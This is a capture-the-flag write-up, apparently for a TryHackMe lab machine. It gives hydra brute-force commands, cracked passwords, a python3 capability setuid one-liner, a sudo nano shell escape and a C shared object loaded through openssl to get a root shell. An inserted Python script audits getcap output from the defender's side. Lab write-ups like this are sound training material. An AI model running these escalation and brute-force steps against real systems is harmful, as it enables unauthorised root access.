Open Ports
Hidden directories -
/news
/contact
/img
/staff
/backdoor
First flag -
thm{b6.............................}
in the source code of the default page on port 80
Second flag -
thm{67.............................}
in the hidden files, listed with ls -la after anonymous FTP login
Credentials -
username: rcampbell
password: cinderella
username: gcrawford
password: evelina
via hydra
Third flag -
thm{12.............................}
in the hidden files, listed with ls -la after FTP login as rcampbell
Log in via SSH as rcampbell and search for capabilities
getcap -r / 2>/dev/null
python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
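Defender-side view of the capability step above, as an added example that is not part of the original writeup: it audits getcap -r output and flags interpreters holding identity-changing capabilities, which is what the python3 one-liner relies on. The sample output, the DANGEROUS and INTERPRETERS lists and the severity labels are assumptions constructed for illustration.

```python
import re

# Capabilities that change identity or bypass file permission checks (assumed list).
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner"}
# Programs that run arbitrary user-supplied code (assumed, not exhaustive).
INTERPRETERS = re.compile(r"^(python|perl|ruby|php|node|lua|gdb|vim?|bash|sh)[\d.]*$")
# One capability clause: "cap_setuid,cap_setgid+ep", "cap_net_raw=ep" or "=ep" (all).
CLAUSE = re.compile(r"^([a-z_,0-9]*)([=+])([eip]+)$")
# Constructed sample of `getcap -r / 2>/dev/null` output, old and new libcap formats.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/opt/backup/agent cap_dac_read_search=ep
"""

def parse_getcap_line(line):
    """Return (path, {capability: flags}) for one getcap line, or None."""
    tokens, clauses = line.strip().split(" "), []
    while tokens and CLAUSE.match(tokens[-1]):   # clauses sit at the end of the line
        clauses.append(CLAUSE.match(tokens.pop()).groups())
    if tokens and tokens[-1] == "=":             # older libcap prints "path = caps"
        tokens.pop()
    path = " ".join(tokens)
    if not path or not clauses:
        return None
    caps = {}
    for names, _op, flags in clauses:
        for name in (names.split(",") if names else ["all"]):
            caps[name] = flags
    return path, caps

def audit(getcap_output):
    """Return [(severity, path, capabilities)] for files that deserve review."""
    findings = []
    for path, caps in filter(None, map(parse_getcap_line, getcap_output.splitlines())):
        # "p" (permitted) is enough: the program can raise the capability itself.
        risky = sorted(c for c, f in caps.items()
                       if "p" in f and (c in DANGEROUS or c == "all"))
        if not risky:
            continue
        high = INTERPRETERS.match(path.rsplit("/", 1)[-1]) or "all" in risky
        findings.append(("high" if high else "review", path, risky))
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE))
```

A "high" finding is cleared with setcap -r on the file; "review" entries need a decision about whether the program really needs that capability.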
Crack the passphrase for gcrawford's id_rsa
Privilege escalation from the gcrawford user is possible because of sudo rights over nano
See the GTFOBins entry for nano
sudo nano
^R^X
reset; sh 1>&0 2>&0
Crack the password for http://10.10.68.205/backdoor
username: plague
password: tonyhawk
hydra -l plague -P /usr/share/wordlists/rockyou.txt 10.10.68.205 http-post-form "/api/login:username=^USER^&password=^PASS^:Incorrect"
Once logged in, you can get a reverse shell as user production
and achieve privilege escalation using this C code -
Check out this blog for more on it: ld_preload-privesc
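#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h> /* setgid(), setuid() */
/* _init() runs as soon as the shared object is loaded */
void _init(){
    setgid(0);
    setuid(0);
    system("/bin/sh");
}
gcc -fPIC -shared -nostartfiles -o shell.so shell.c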
sudo openssl req -engine ./shell.so
Fourth flag -
thm{b9.............................}
in the root directory
Fifth flag -
thm{d8.............................}
in the home directory of gcrawford, within business.txt
Sixth flag -
thm{87.............................}
in the home directory of production
Seventh flag -
thm{3c.............................}
in the home directory of tryhackme
Eighth flag -
thm{21.............................}
in /etc/vsftpd.conf
Ninth flag -
thm{06.............................}
in /etc/ssh/sshd_config